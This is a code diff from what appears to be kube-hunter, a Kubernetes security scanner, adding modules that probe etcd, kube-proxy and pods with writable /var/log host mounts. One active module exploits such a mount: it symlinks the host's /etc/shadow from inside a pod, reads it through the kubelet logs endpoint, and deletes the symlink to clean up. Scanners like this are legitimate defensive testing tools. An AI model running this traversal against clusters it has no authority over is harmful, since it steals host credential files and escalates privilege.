logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
try:
r = requests.get(
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
verify=False,
timeout=config.network_timeout,
)
self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
return self.keys_evidence
except requests.exceptions.ConnectionError:
return False
def version_disclosure(self):
config = get_config()
logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
try:
r = requests.get(
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
verify=False,
timeout=config.network_timeout,
)
self.version_evidence = r.content if r.status_code == 200 and r.content else False
return self.version_evidence
except requests.exceptions.ConnectionError:
return False
def insecure_access(self):
config = get_config()
logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
try:
r = requests.get(
f"http://{self.event.host}:{ETCD_PORT}/version",
verify=False,
timeout=config.network_timeout,
)
return r.content if r.status_code == 200 and r.content else False
except requests.exceptions.ConnectionError:
return False
def execute(self):
if self.insecure_access(): # make a decision between http and https protocol
self.event.protocol = "http"
if self.version_disclosure():
self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
if self.event.protocol == "http":
self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
if self.db_keys_disclosure():
self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,158 @@
import logging
import re
import uuid
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import (
ActiveHunter,
Hunter,
KubernetesCluster,
PrivilegeEscalation,
)
from kube_hunter.modules.hunting.kubelet import (
ExposedPodsHandler,
ExposedRunHandler,
KubeletHandlers,
)
logger = logging.getLogger(__name__)
class WriteMountToVarLog(Vulnerability, Event):
"""A pod can create symlinks in the /var/log directory on the host, which can lead to a root directory traveral"""
def __init__(self, pods):
Vulnerability.__init__(
self,
KubernetesCluster,
"Pod With Mount To /var/log",
category=PrivilegeEscalation,
vid="KHV047",
)
self.pods = pods
self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
class DirectoryTraversalWithKubelet(Vulnerability, Event):
"""An attacker can run commands on pods with mount to /var/log,
and traverse read all files on the host filesystem"""
def __init__(self, output):
Vulnerability.__init__(
self,
KubernetesCluster,
"Root Traversal Read On The Kubelet",
category=PrivilegeEscalation,
)
self.output = output
self.evidence = f"output: {self.output}"
@handler.subscribe(ExposedPodsHandler)
class VarLogMountHunter(Hunter):
"""Mount Hunter - /var/log
Hunt pods that have write access to host's /var/log. in such case,
the pod can traverse read files on the host machine
"""
def __init__(self, event):
self.event = event
def has_write_mount_to(self, pod_data, path):
"""Returns volume for correlated writable mount"""
for volume in pod_data["spec"]["volumes"]:
if "hostPath" in volume:
if "Directory" in volume["hostPath"]["type"]:
if volume["hostPath"]["path"].startswith(path):
return volume
def execute(self):
pe_pods = []
for pod in self.event.pods:
if self.has_write_mount_to(pod, path="/var/log"):
pe_pods.append(pod)
if pe_pods:
self.publish_event(WriteMountToVarLog(pods=pe_pods))
@handler.subscribe(ExposedRunHandler)
class ProveVarLogMount(ActiveHunter):
"""Prove /var/log Mount Hunter
Tries to read /etc/shadow on the host by running commands inside a pod with host mount to /var/log
"""
def __init__(self, event):
self.event = event
self.base_path = f"https://{self.event.host}:{self.event.port}"
def run(self, command, container):
run_url = KubeletHandlers.RUN.value.format(
podNamespace=container["namespace"],
podID=container["pod"],
containerName=container["name"],
cmd=command,
)
return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
# TODO: replace with multiple subscription to WriteMountToVarLog as well
def get_varlog_mounters(self):
config = get_config()
logger.debug("accessing /pods manually on ProveVarLogMount")
pods = self.event.session.get(
f"{self.base_path}/" + KubeletHandlers.PODS.value,
verify=False,
timeout=config.network_timeout,
).json()["items"]
for pod in pods:
volume = VarLogMountHunter(ExposedPodsHandler(pods=pods)).has_write_mount_to(pod, "/var/log")
if volume:
yield pod, volume
def mount_path_from_mountname(self, pod, mount_name):
"""returns container name, and container mount path correlated to mount_name"""
for container in pod["spec"]["containers"]:
for volume_mount in container["volumeMounts"]:
if volume_mount["name"] == mount_name:
logger.debug(f"yielding {container}")
yield container, volume_mount["mountPath"]
def traverse_read(self, host_file, container, mount_path, host_path):
"""Returns content of file on the host, and cleans trails"""
config = get_config()
symlink_name = str(uuid.uuid4())
# creating symlink to file
self.run(f"ln -s {host_file} {mount_path}/{symlink_name}", container)
# following symlink with kubelet
path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(
path=re.sub(r"^/var/log", "", host_path) + symlink_name
)
content = self.event.session.get(
f"{self.base_path}/{path_in_logs_endpoint}",
verify=False,
timeout=config.network_timeout,
).text
# removing symlink
self.run(f"rm {mount_path}/{symlink_name}", container=container)
return content
def execute(self):
for pod, volume in self.get_varlog_mounters():
for container, mount_path in self.mount_path_from_mountname(pod, volume["name"]):
logger.debug("Correlated container to mount_name")
cont = {
"name": container["name"],
"pod": pod["metadata"]["name"],
"namespace": pod["metadata"]["namespace"],
}
try:
output = self.traverse_read(
"/etc/shadow",
container=cont,
mount_path=mount_path,
host_path=volume["hostPath"]["path"],
)
self.publish_event(DirectoryTraversalWithKubelet(output=output))
except Exception:
logger.debug("Could not exploit /var/log", exc_info=True)

View File

@@ -0,0 +1,127 @@
import logging
import requests
from enum import Enum
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure
from kube_hunter.core.types import (
ActiveHunter,
Hunter,
KubernetesCluster,
InformationDisclosure,
)
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
from kube_hunter.modules.discovery.proxy import KubeProxyEvent
logger = logging.getLogger(__name__)
class KubeProxyExposed(Vulnerability, Event):
"""All operations on the cluster are exposed"""
def __init__(self):
Vulnerability.__init__(
self,
KubernetesCluster,
"Proxy Exposed",
category=InformationDisclosure,
vid="KHV049",
)
class Service(Enum):
DASHBOARD = "kubernetes-dashboard"
@handler.subscribe(KubeProxyEvent)
class KubeProxy(Hunter):
"""Proxy Hunting
Hunts for a dashboard behind the proxy
"""
def __init__(self, event):
self.event = event
self.api_url = f"http://{self.event.host}:{self.event.port}/api/v1"
def execute(self):
self.publish_event(KubeProxyExposed())
for namespace, services in self.services.items():
for service in services:
if service == Service.DASHBOARD.value:
logger.debug(f"Found a dashboard service '{service}'")
# TODO: check if /proxy is a convention on other services
curr_path = f"api/v1/namespaces/{namespace}/services/{service}/proxy"
self.publish_event(KubeDashboardEvent(path=curr_path, secure=False))
@property
def namespaces(self):
config = get_config()
resource_json = requests.get(f"{self.api_url}/namespaces", timeout=config.network_timeout).json()
return self.extract_names(resource_json)
@property
def services(self):
config = get_config()
# map between namespaces and service names
services = dict()
for namespace in self.namespaces:
resource_path = f"{self.api_url}/namespaces/{namespace}/services"
resource_json = requests.get(resource_path, timeout=config.network_timeout).json()
services[namespace] = self.extract_names(resource_json)
logger.debug(f"Enumerated services [{' '.join(services)}]")
return services
@staticmethod
def extract_names(resource_json):
names = list()
for item in resource_json["items"]:
names.append(item["metadata"]["name"])
return names
@handler.subscribe(KubeProxyExposed)
class ProveProxyExposed(ActiveHunter):
"""Build Date Hunter
Hunts when proxy is exposed, extracts the build date of kubernetes
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
version_metadata = requests.get(
f"http://{self.event.host}:{self.event.port}/version",
verify=False,
timeout=config.network_timeout,
).json()
if "buildDate" in version_metadata:
self.event.evidence = "build date: {}".format(version_metadata["buildDate"])
@handler.subscribe(KubeProxyExposed)
class K8sVersionDisclosureProve(ActiveHunter):
"""K8s Version Hunter
Hunts Proxy when exposed, extracts the version
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
version_metadata = requests.get(
f"http://{self.event.host}:{self.event.port}/version",
verify=False,
timeout=config.network_timeout,
).json()
if "gitVersion" in version_metadata:
self.publish_event(
K8sVersionDisclosure(
version=version_metadata["gitVersion"],
from_endpoint="/version",
extra_info="on kube-proxy",
)
)

Some files were not shown because too many files have changed in this diff Show More